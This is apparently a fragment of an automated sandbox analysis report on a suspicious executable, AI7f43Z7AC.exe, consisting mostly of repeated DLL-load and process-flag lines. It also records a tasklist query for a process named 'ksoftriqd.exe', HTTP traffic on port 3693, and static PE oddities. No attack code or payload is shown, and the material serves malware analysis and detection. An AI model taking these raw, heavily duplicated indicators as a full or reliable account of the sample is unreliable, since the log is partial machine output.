Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ksoftriqd.exe"
Source: AI7f43Z7AC.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: AI7f43Z7AC.exeStatic file information: File size 5077504 > 1048576
Source: AI7f43Z7AC.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x239200
Source: AI7f43Z7AC.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x251c00
Source: AI7f43Z7AC.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: AI7f43Z7AC.exeStatic PE information: section name: .xdata
Source: AI7f43Z7AC.exeStatic PE information: section name: .symtab

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 3693
Source: unknownNetwork traffic detected: HTTP traffic on port 3693 -> 49960
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
